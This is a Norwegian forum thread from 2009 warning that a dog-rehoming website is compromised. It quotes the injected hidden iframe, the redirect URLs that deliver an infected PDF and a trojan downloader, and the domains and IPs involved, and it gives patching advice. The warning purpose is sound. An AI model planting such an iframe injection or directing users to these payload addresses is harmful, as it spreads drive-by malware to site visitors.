Hunder til besvær

[norbat]

Selv for en dyrevenn så er ikke alt som lukter hund, bra. Nettstedet 'hxxp://www.omplasseringavhunder.no' er fortiden infisert med malware som prøver å utnytte kjente sårbarheter knyttet til div. program.

 

Javascript-injeksjonen, som er lagt inn på siden, henter info fra:

<iframe id="1e321863e201f914ad22f7669a83199d" name="d9660710064c187e1f82343133ab4fe1" width=1

height=1 frameborder=0 src="hxxp://thehugetitstop.cn/dontstop.html"></iframe>

 

Via redirect :

hxxp://vpsspeedin.ru/x/pdf.php -> henter en infisert .pdf-fil (adobe reader)

hxxp://vpsspeedin.ru/x/load.php?id=x -> henter en TrojanDownloader, XPpoliceAntivirus

 

Domener involvert:

thehugetitstop.cn 91.212.65.33

gianthighestfind.cn 91.212.65.33

tozxiqud.cn 91.212.65.7

vpsspeedin.ru 91.212.65.33

ralcofic.cn 91.212.65.7

8addition.info 210.48.154.132

 

I tillegg er det tegn på at pc'n vil bli forsøkt inkl. i et botnet knyttet til epost-spam.

 

Infeksjonen er vanlig og prøver å utnytte kjente sårbarheter knyttet til

Flash Player

Adobe Reader

Office Snapshot Viewer

 

Tiltak er å holde programmene (inkl antivirus) oppdatert. Benytt gjerne F-secure sin Health Check

Endret 7. mars 2009 av norbat

[Hrodebert]

Takk for tipset.

 

Det er intet nytt at denne type organisasjoner og domene navn vil bli utnyttet. Da dette som oftest er det man minst sammenligner med virus og malware.

 

Min BitDefender stopper heldigvis et hver forsøk. Oppdaterte FireFox til versjon 3.0.7. i dag også.

Endret 7. mars 2009 av roberteh

[Dobica]

Hva mener du med dette? Kan jeg få virus berre av å gå inn på den siden?

[norbat]

Hva mener du med dette? Kan jeg få virus berre av å gå inn på den siden?

 

Ja

[Dobica]

Okey, takk for tipset Da holder jeg meg borte derfra